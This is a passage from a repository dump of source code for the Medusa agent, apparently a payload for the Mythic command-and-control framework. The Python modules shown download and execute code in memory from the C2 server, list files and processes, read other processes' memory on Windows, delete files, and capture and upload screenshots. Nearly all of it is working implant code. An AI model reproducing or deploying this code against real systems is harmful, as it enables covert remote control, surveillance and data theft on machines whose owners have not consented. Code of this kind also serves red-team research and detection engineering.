fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys(): return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_module.py3",
    "content": "    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import types\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package:\n                    mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec(code, mod.__dict__)\n                return mod\n\n            def get_data(self, fullpath):\n\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try:\n                    return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError:\n                    raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys():\n            return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_script.py",
    "content": "    def load_script(self, task_id, file):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: exec(cmd_code)\n        else: return \"Failed to load script\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ls.py2",
    "content": "\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name not in [\".\", \"\" ] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),\n            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": int(file_details.st_atime * 1000),\n            \"modify_time\": int(file_details.st_mtime * 1000),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            for entry in os.listdir(file_path):\n                full_path = os.path.join(file_path, entry)\n                file = {}\n                file['name'] = entry \n                file['is_file'] = True if os.path.isfile(full_path) else False\n                try:\n                    file_details = os.stat(full_path)\n                    file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                    file[\"access_time\"] = int(file_details.st_atime * 1000)\n                    file[\"modify_time\"] = int(file_details.st_mtime * 1000)\n                    file[\"size\"] = file_details.st_size\n                except OSError as e:\n                    pass\n                files.append(file)\n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        output =  { \"files\": files, \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)), \"name\":  target_name if target_name not in  [\".\", \"\"] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep))  }\n        return json.dumps(output)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ls.py3",
    "content": "    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name not in [\".\", \"\" ] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),        \n            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": int(file_details.st_atime * 1000),\n            \"modify_time\": int(file_details.st_mtime * 1000),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            with os.scandir(file_path) as entries:\n                for entry in entries:\n                    file = {}\n                    file['name'] = entry.name\n                    file['is_file'] = True if entry.is_file() else False\n                    try:\n                        file_details = os.stat(os.path.join(file_path, entry.name))\n                        file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                        file[\"access_time\"] = int(file_details.st_atime * 1000)\n                        file[\"modify_time\"] = int(file_details.st_mtime * 1000)\n                        file[\"size\"] = file_details.st_size\n                    except OSError as e:\n                        pass\n                    files.append(file)  \n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        output = { \"files\": files, \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)), \"name\":  target_name if target_name not in  [\".\", \"\"] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep))  }\n        return json.dumps(output)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/mv.py",
    "content": "    def mv(self, task_id, source, destination):\n        import shutil\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n        shutil.move(source_path, dest_path)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/pip_freeze.py",
    "content": "    def pip_freeze(self, task_id):\n        out=\"\"\n        try:\n            import pkg_resources\n            installed_packages = pkg_resources.working_set\n            installed_packages_list = sorted([\"%s==%s\" % (i.key, i.version) for i in installed_packages])\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkg_resources module not installed.\\n\"\n\n        try:\n            from pip._internal.operations.freeze import freeze\n            installed_packages_list = freeze(local_only=True)\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pip module not installed.\\n\"\n\n        try:\n            import pkgutil\n            installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()]\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkgutil module not installed.\\n\"\n\n        return out+\"[!] No modules available to list installed packages.\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps.py2",
    "content": "    def ps(self, task_id):\n\n        def get_user_id_map():\n\n            user_map = {}\n            # get username from uid\n            with open(\"/etc/passwd\", \"r\") as f:\n                passwd = f.readlines()\n\n            for line in passwd:\n                user_line_arr = line.split(\":\")\n                username = user_line_arr[0].strip()\n                uid = user_line_arr[2].strip()\n                user_map[uid] = username\n\n            return user_map\n\n        processes = []\n        if os.name == 'posix':\n\n            # Get the user map\n            user_map = get_user_id_map()\n\n            # get list of PIDs by performing a directory listing on /proc\n            pids = [pid for pid in os.listdir(\"/proc\") if pid.isdigit()]\n\n            # loop through each PID and output information similar to ps command\n            for pid in pids:\n                # construct path to status file\n                status_path = \"/proc/%s/status\" % str(pid)\n\n                # read in the status file - bail if process dies before we read the status file\n                try:\n                    with open(status_path, \"r\") as f:\n                        status = f.readlines()\n                except Exception as e:\n                    continue\n\n                # construct path to status file\n                cmdline_path = \"/proc/%s/cmdline\" % str(pid)\n\n                # read in the status file\n                with open(cmdline_path, \"r\") as f:\n                    cmdline = f.read()\n                    cmd_arr = cmdline.split(\"\\x00\")\n                    cmdline = \" \".join(cmd_arr)\n\n                # extract relevant information from status file\n                name = \"\"\n                ppid = \"\"\n                uid = \"\"\n                username = \"\"\n\n                for line in status:\n                    if line.startswith(\"Name:\"):\n                        name = line.split()[1].strip()\n                    elif line.startswith(\"PPid:\"):\n                        ppid = line.split()[1].strip()\n                    elif line.startswith(\"Uid:\"):\n                        uid = line.split()[1].strip()\n\n                # Map the uid to the username\n                if uid in user_map:\n                    username = user_map[uid]\n\n                process = {\"process_id\": int(pid), \"parent_process_id\": int(ppid), \"user_id\": username, \"name\": name,\n                           \"bin_path\": cmdline}\n\n                processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return json.dumps({ \"processes\": processes })"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps.py3",
    "content": "    def ps(self, task_id):\n        import os\n        processes = []\n        if os.name == 'posix':\n\n            def get_user_id_map():\n\n                user_map = {}\n                # get username from uid\n                with open(\"/etc/passwd\", \"r\") as f:\n                    passwd = f.readlines()\n\n                for line in passwd:\n                    user_line_arr = line.split(\":\")\n                    username = user_line_arr[0].strip()\n                    uid = user_line_arr[2].strip()\n                    user_map[uid] = username\n\n                return user_map\n\n            # Get the user map\n            user_map = get_user_id_map()\n\n            # get list of PIDs by performing a directory listing on /proc\n            pids = [pid for pid in os.listdir(\"/proc\") if pid.isdigit()]\n\n            # loop through each PID and output information similar to ps command\n            for pid in pids:\n                # construct path to status file\n                status_path = \"/proc/%s/status\" % str(pid)\n\n                # read in the status file - bail if process dies before we read the status file\n                try:\n                    with open(status_path, \"r\") as f:\n                        status = f.readlines()\n                except Exception as e:\n                    continue\n\n                # construct path to status file\n                cmdline_path = \"/proc/%s/cmdline\" % str(pid)\n\n                # read in the status file\n                with open(cmdline_path, \"r\") as f:\n                    cmdline = f.read()\n                    cmd_arr = cmdline.split(\"\\x00\")\n                    cmdline = \" \".join(cmd_arr)\n\n                # extract relevant information from status file\n                name = \"\"\n                ppid = \"\"\n                uid = \"\"\n                username = \"\"\n\n                for line in status:\n                    if line.startswith(\"Name:\"):\n                        name = line.split()[1].strip()\n                    elif line.startswith(\"PPid:\"):\n                        ppid = line.split()[1].strip()\n                    elif line.startswith(\"Uid:\"):\n                        uid = line.split()[1].strip()\n\n                # Map the uid to the username\n                if uid in user_map:\n                    username = user_map[uid]\n\n                process = {\"process_id\": int(pid), \"parent_process_id\": int(ppid), \"user_id\": username, \"name\": name,\n                           \"bin_path\": cmdline}\n\n                processes.append(process)\n\n        elif os.name == 'nt':\n\n            import sys, os.path, ctypes, ctypes.wintypes, re\n            from ctypes import create_unicode_buffer, GetLastError\n\n            def _check_bool(result, func, args):\n                if not result:\n                    raise ctypes.WinError(ctypes.get_last_error())\n                return args\n\n            PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n            ULONG_PTR = ctypes.wintypes.LPVOID\n            SIZE_T = ctypes.c_size_t\n            NTSTATUS = ctypes.wintypes.LONG\n            PVOID = ctypes.wintypes.LPVOID\n            PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n            Psapi = ctypes.WinDLL('Psapi.dll')\n            EnumProcesses = Psapi.EnumProcesses\n            EnumProcesses.restype = ctypes.wintypes.BOOL\n            GetProcessImageFileName = Psapi.GetProcessImageFileNameA\n            GetProcessImageFileName.restype = ctypes.wintypes.DWORD\n\n            Kernel32 = ctypes.WinDLL('kernel32.dll')\n            OpenProcess = Kernel32.OpenProcess\n            OpenProcess.restype = ctypes.wintypes.HANDLE\n            CloseHandle = Kernel32.CloseHandle\n            CloseHandle.errcheck = _check_bool\n            IsWow64Process = Kernel32.IsWow64Process\n\n            WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n            MAX_PATH = 260\n            PROCESS_TERMINATE = 0x0001\n            PROCESS_QUERY_INFORMATION = 0x0400\n\n            TOKEN_QUERY = 0x0008\n            TOKEN_READ = 0x00020008\n            TOKEN_IMPERSONATE = 0x00000004\n            TOKEN_QUERY_SOURCE = 0x0010\n            TOKEN_DUPLICATE = 0x0002\n            TOKEN_ASSIGN_PRIMARY = 0x0001\n\n            ProcessBasicInformation = 0\n            ProcessDebugPort = 7\n            ProcessWow64Information = 26\n            ProcessImageFileName = 27\n            ProcessBreakOnTermination = 29\n\n            STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001)\n            STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n            STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value\n            STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n            def query_dos_device(drive_letter):\n                chars = 1024\n                drive_letter = drive_letter\n                p = create_unicode_buffer(chars)\n                if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars):\n                    pass\n                return p.value\n\n            def create_drive_mapping():\n                mappings = {}\n                for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n                    try:\n                        letter = u'%s:' % letter\n                        mapped = query_dos_device(letter)\n                        mappings[mapped] = letter\n                    except WindowsError:\n                        pass\n                return mappings\n\n            mappings = create_drive_mapping()\n            def normalise_binpath(path):\n                match = re.match(r'(^\\\\Device\\\\[a-zA-Z0-9]+)(\\\\.*)?$', path)\n                if not match:\n                    return f\"Cannot convert {path} into a Win32 compatible path\"\n                if not match.group(1) in mappings:\n                    return None\n                drive = mappings[match.group(1)]\n                if not drive or not match.group(2):\n                    return drive\n                return drive + match.group(2)\n\n            count = 32\n            while True:\n                ProcessIds = (ctypes.wintypes.DWORD*count)()\n                cb = ctypes.sizeof(ProcessIds)\n                BytesReturned = ctypes.wintypes.DWORD()\n                if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                    if BytesReturned.value<cb:\n                        break\n                    else:\n                        count *= 2\n                else:\n                    sys.exit(\"Call to EnumProcesses failed\")\n\n            for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n                process = {}\n                process[\"process_id\"] = ProcessId = ProcessIds[index]\n                if ProcessId == 0: continue\n\n                hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId)\n                if hProcess:\n                    ImageFileName = (ctypes.c_char*MAX_PATH)()\n                    Is64Bit = ctypes.c_int32()\n                    IsWow64Process(hProcess, ctypes.byref(Is64Bit))\n                    arch = \"x86\" if Is64Bit.value else \"x64\"\n                    process[\"architecture\"] = arch\n\n\n                    if GetProcessImageFileName(hProcess, ImageFileName, MAX_PATH)>0:\n                        filename = os.path.basename(ImageFileName.value)\n                        process[\"name\"] = filename.decode()\n                        process[\"bin_path\"] = normalise_binpath(ImageFileName.value.decode())\n\n                    CloseHandle(hProcess)\n                processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return json.dumps({ \"processes\": processes })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps_full.py3",
    "content": "    def ps_full(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE, \n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,           \n            ctypes.POINTER(SIZE_T))\n\n        MAX_PATH = 260\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else: buf = (ctypes.c_char * size)()\n                else: buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \\\n                        ctypes.sizeof(buf), ctypes.byref(nread))\n                if simple: return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG,\n            PULONG)        \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                if not self._query_info() or (process_id is not None \\\n                    and self._process_id != process_id):\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e: pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle, ProcessBasicInformation,\n                            ctypes.byref(info), ctypes.sizeof(info), None)\n                if status < 0:\n                    return False\n\n                self._process_id = info.UniqueProcessId\n                self._parent_process_id = info.InheritedFromUniqueProcessId\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._params = peb.ProcessParameters[0, handle]\n\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(handle, ctypes.byref(Is64Bit))\n                self._arch = \"x86\" if Is64Bit.value else \"x64\"\n\n            @property\n            def process_id(self):\n                return self._process_id\n\n            @property\n            def session_id(self):\n                return self._peb.SessionId\n\n            @property\n            def image_path(self):\n                ustr = self._params.ImagePathName\n                return ustr.Buffer[0, self._handle, ustr.Length]\n\n            @property\n            def command_line(self):\n                ustr = self._params.CommandLine\n                buf = ustr.Buffer[0, self._handle, ustr.Length]\n                return buf\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            BytesReturned = ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            try:\n                pi = ProcessInformation(ProcessId)\n                process[\"name\"] = os.path.basename(pi.image_path)\n                process[\"architecture\"] = str(pi._arch)\n                process[\"bin_path\"] = pi.image_path\n                process[\"integrity_level\"] = pi.session_id\n                process[\"parent_process_id\"] = pi._parent_process_id\n                process[\"command_line\"] = pi.command_line\n            except:\n                pass\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/rm.py",
    "content": "    def rm(self, task_id, path):\n        import shutil\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        if os.path.isdir(file_path):\n            shutil.rmtree(file_path)\n        else:\n            os.remove(file_path)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/screenshot.py2",
    "content": "    def screenshot(self, task_id):\n        from Cocoa import NSURL, NSBitmapImageRep\n        import LaunchServices\n        import Quartz\n        import Quartz.CoreGraphics as CG\n        region = CG.CGRectInfinite\n        image = CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\n        sh_data = CG.CFDataCreateMutable(None, 0)\n        dest = Quartz.CGImageDestinationCreateWithData(sh_data, LaunchServices.kUTTypePNG, 1, None)\n        file_size = 0\n        if(dest):\n            Quartz.CGImageDestinationAddImage (dest, image, 0)\n            if (Quartz.CGImageDestinationFinalize(dest)):\n                file_size = CG.CFDataGetLength(sh_data)\n\n        if(file_size) > 0:\n            total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n            data = {\n                \"action\": \"post_response\", \n                \"responses\": [\n                {\n                    \"task_id\": task_id,\n                    \"total_chunks\": total_chunks,\n                    \"file_path\": str(datetime.now()),\n                    \"chunk_size\": CHUNK_SIZE,\n                    \"is_screenshot\": True \n                }]\n            }\n            initial_response = self.postMessageAndRetrieveResponse(data)\n            for i in range(0,total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                if i == total_chunks:\n                    content = sh_data[i*CHUNK_SIZE:]\n                else:\n                    content = sh_data[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": i+1,\n                            \"file_id\": initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": base64.b64encode(content),\n                            \"task_id\": task_id                        \n                        }\n                    ]\n                }\n                response = 